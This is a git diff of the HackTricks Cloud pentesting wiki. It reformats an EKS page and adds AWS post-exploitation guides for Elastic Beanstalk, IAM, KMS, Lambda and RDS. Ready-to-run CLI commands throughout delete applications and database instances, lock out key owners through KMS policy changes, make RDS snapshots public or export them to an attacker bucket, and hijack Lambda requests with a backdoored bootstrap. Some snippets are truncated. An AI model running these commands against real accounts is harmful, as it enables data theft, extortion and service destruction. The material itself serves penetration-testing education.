/etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false ``` -{% endcode %}
@@ -57,36 +42,36 @@ API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazon ```yaml describe-cache-parametersapiVersion: v1 clusters: -- cluster: - certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== - server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com - name: arn:aws:eks:us-east-1::cluster/ + - cluster: + certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== + server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com + name: arn:aws:eks:us-east-1::cluster/ contexts: -- context: - cluster: arn:aws:eks:us-east-1::cluster/ - user: arn:aws:eks:us-east-1::cluster/ - name: arn:aws:eks:us-east-1::cluster/ + - context: + cluster: arn:aws:eks:us-east-1::cluster/ + user: arn:aws:eks:us-east-1::cluster/ + name: arn:aws:eks:us-east-1::cluster/ current-context: arn:aws:eks:us-east-1::cluster/ kind: Config preferences: {} users: -- name: arn:aws:eks:us-east-1::cluster/ - user: - exec: - apiVersion: client.authentication.k8s.io/v1beta1 - args: - - --region - - us-west-2 - - --profile - - - - eks - - get-token - - --cluster-name - - - command: aws - env: null - interactiveMode: IfAvailable - provideClusterInfo: false + - name: arn:aws:eks:us-east-1::cluster/ + user: + exec: + apiVersion: client.authentication.k8s.io/v1beta1 + args: + - --region + - us-west-2 + - --profile + - + - eks + - get-token + - --cluster-name + - + command: aws + env: null + interactiveMode: IfAvailable + provideClusterInfo: false ```
@@ -97,9 +82,8 @@ The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get int The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**. -{% hint style="warning" %} -Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. -{% endhint %} +> [!WARNING] +> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps). @@ -119,8 +103,8 @@ https://...eks.amazonaws.com Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one: -* gr7 -* yl4 +- gr7 +- yl4 Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list @@ -146,9 +130,8 @@ Then with wfuzz wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com ``` -{% hint style="warning" %} -Remember to replace & . -{% endhint %} +> [!WARNING] +> Remember to replace & . ### Bypass CloudTrail @@ -164,23 +147,9 @@ By default the **user or role that created** a cluster is **ALWAYS going to have So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**. -{% hint style="success" %} -Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. +> [!TIP] +> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. +> +> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. -Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md new file mode 100644 index 000000000..59b9fd453 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md @@ -0,0 +1,80 @@ +# AWS - Elastic Beanstalk Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Elastic Beanstalk + +For more information: + +{{#ref}} +../aws-services/aws-elastic-beanstalk-enum.md +{{#endref}} + +### `elasticbeanstalk:DeleteApplicationVersion` + +> [!NOTE] +> TODO: Test if more permissions are required for this + +An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. + +```bash +aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version +``` + +**Potential Impact**: Disruption of application deployment and potential loss of application versions. + +### `elasticbeanstalk:TerminateEnvironment` + +> [!NOTE] +> TODO: Test if more permissions are required for this + +An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. + +```bash +aws elasticbeanstalk terminate-environment --environment-name my-existing-env +``` + +**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. + +### `elasticbeanstalk:DeleteApplication` + +> [!NOTE] +> TODO: Test if more permissions are required for this + +An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. + +```bash +aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force +``` + +**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. + +### `elasticbeanstalk:SwapEnvironmentCNAMEs` + +> [!NOTE] +> TODO: Test if more permissions are required for this + +An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. + +```bash +aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 +``` + +**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. + +### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` + +> [!NOTE] +> TODO: Test if more permissions are required for this + +An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. + +```bash +aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 + +aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag +``` + +**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md new file mode 100644 index 000000000..f364899bb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md @@ -0,0 +1,103 @@ +# AWS - IAM Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## IAM + +For more information about IAM access: + +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} + +## Confused Deputy Problem + +If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. + +Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. + +
+ +However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. + +Example: + +```json +{ + "Version": "2012-10-17", + "Statement": { + "Effect": "Allow", + "Principal": { + "AWS": "Example Corp's AWS Account ID" + }, + "Action": "sts:AssumeRole", + "Condition": { + "StringEquals": { + "sts:ExternalId": "12345" + } + } + } +} +``` + +> [!WARNING] +> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. + +### Unexpected Trusts + +#### Wildcard as principal + +```json +{ + "Action": "sts:AssumeRole", + "Effect": "Allow", + "Principal": { "AWS": "*" } +} +``` + +This policy **allows all AWS** to assume the role. + +#### Service as principal + +```json +{ + "Action": "lambda:InvokeFunction", + "Effect": "Allow", + "Principal": { "Service": "apigateway.amazonaws.com" }, + "Resource": "arn:aws:lambda:000000000000:function:foo" +} +``` + +This policy **allows any account** to configure their apigateway to call this Lambda. + +#### S3 as principal + +```json +"Condition": { +"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, + "StringEquals": { + "aws:SourceAccount": "123456789012" + } +} +``` + +If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. + +#### Not supported + +```json +{ + "Effect": "Allow", + "Principal": { "Service": "cloudtrail.amazonaws.com" }, + "Action": "s3:PutObject", + "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" +} +``` + +A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). + +## References + +- [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md new file mode 100644 index 000000000..e03c8a315 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md @@ -0,0 +1,133 @@ +# AWS - KMS Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS + +For more information check: + +{{#ref}} +../aws-services/aws-kms-enum.md +{{#endref}} + +### Encrypt/Decrypt information + +`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: + +- `fileb://:` Reads the file in binary mode, commonly used for non-text files. +- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. + +> [!TIP] +> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) + +- Using a **symmetric** key + +```bash +# Encrypt data +aws kms encrypt \ + --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ + --plaintext fileb:///tmp/hello.txt \ + --output text \ + --query CiphertextBlob | base64 \ + --decode > ExampleEncryptedFile + +# Decrypt data +aws kms decrypt \ + --ciphertext-blob fileb://ExampleEncryptedFile \ + --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ + --output text \ + --query Plaintext | base64 \ + --decode +``` + +- Using a **asymmetric** key: + +```bash +# Encrypt data +aws kms encrypt \ + --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ + --encryption-algorithm RSAES_OAEP_SHA_256 \ + --plaintext fileb:///tmp/hello.txt \ + --output text \ + --query CiphertextBlob | base64 \ + --decode > ExampleEncryptedFile + +# Decrypt data +aws kms decrypt \ + --ciphertext-blob fileb://ExampleEncryptedFile \ + --encryption-algorithm RSAES_OAEP_SHA_256 \ + --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ + --output text \ + --query Plaintext | base64 \ + --decode +``` + +### KMS Ransomware + +An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. + +Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. + +> [!WARNING] +> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. + +> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). + +```bash +# Force policy change +aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ + --policy-name default \ + --policy file:///tmp/policy.yaml \ + --bypass-policy-lockout-safety-check + +{ + "Id": "key-consolepolicy-3", + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "kms:*", + "Resource": "*" + } + ] +} +``` + +> [!CAUTION] +> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. + +
+ +### Generic KMS Ransomware + +#### Global KMS Ransomware + +There is another way to perform a global KMS Ransomware, which would involve the following steps: + +- Create a new **key with a key material** imported by the attacker +- **Re-encrypt older data** encrypted with the previous version with the new one. +- **Delete the KMS key** +- Now only the attacker, who has the original key material could be able to decrypt the encrypted data + +### Destroy keys + +```bash +# Destoy they key material previously imported making the key useless +aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab + +# Schedule the destoy of a key (min wait time is 7 days) +aws kms schedule-key-deletion \ + --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ + --pending-window-in-days 7 +``` + +> [!CAUTION] +> Note that AWS now **prevents the previous actions from being performed from a cross account:** + +
+ +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md new file mode 100644 index 000000000..86bc91b90 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md @@ -0,0 +1,29 @@ +# AWS - Lambda Post Exploitation + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda + +For more information check: + +{{#ref}} +../../aws-services/aws-lambda-enum.md +{{#endref}} + +### Steal Others Lambda URL Requests + +If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. + +{{#ref}} +aws-warm-lambda-persistence.md +{{#endref}} + +### Steal Others Lambda URL Requests & Extensions Requests + +Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. + +{{#ref}} +../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +{{#endref}} + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md new file mode 100644 index 000000000..1aa0d0334 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md @@ -0,0 +1,63 @@ +# AWS - Steal Lambda Requests + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda Flow + +

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

+ +1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. +2. The init process listens on port **9001** exposing some interesting endpoints: + - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event + - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke + - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error +3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). +4. Finally, **bootstrap.py** sends to init the **response** + +Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. + +## Stealing Lambda Requests + +The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. + +This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: + +- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. + - A request must be sent to **`/${invoke-id}/response`** + - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). +- Execute a malicious **`boostrap.py`** which will handle the next invocations + - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. + - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. + +### Attack Steps + +1. Find a **RCE** vulnerability. +2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) +3. **Execute** the malicious bootstrap. + +You can easily perform these actions running: + +```bash +python3 < --region +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md similarity index 55% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md index 1e45f292d..dd6517e80 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - RDS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## RDS For more information check: -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-relational-database-rds-enum.md +{{#endref}} ### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance` @@ -59,7 +46,6 @@ An attacker with these permissions could **create an snapshot of a DB** and make If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**. -{% code overflow="wrap" %} ```bash # create snapshot aws rds create-db-snapshot --db-instance-identifier --db-snapshot-identifier @@ -68,17 +54,14 @@ aws rds create-db-snapshot --db-instance-identifier --d aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"} ``` -{% endcode %} ### `rds:DownloadDBLogFilePortion` An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions. -{% code overflow="wrap" %} ```bash aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text ``` -{% endcode %} **Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials. @@ -86,42 +69,24 @@ aws rds download-db-log-file-portion --db-instance-identifier target-instance -- An attacker with these permissions can **DoS existing RDS instances**. -{% code overflow="wrap" %} ```bash # Delete aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot ``` -{% endcode %} **Potential impact**: Deletion of existing RDS instances, and potential loss of data. ### `rds:StartExportTask` -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot. -{% code overflow="wrap" %} ```bash aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id ``` -{% endcode %} **Potential impact**: Access to sensitive data in the exported snapshot. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md similarity index 51% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md index ba908badb..803b6a14d 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - S3 Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
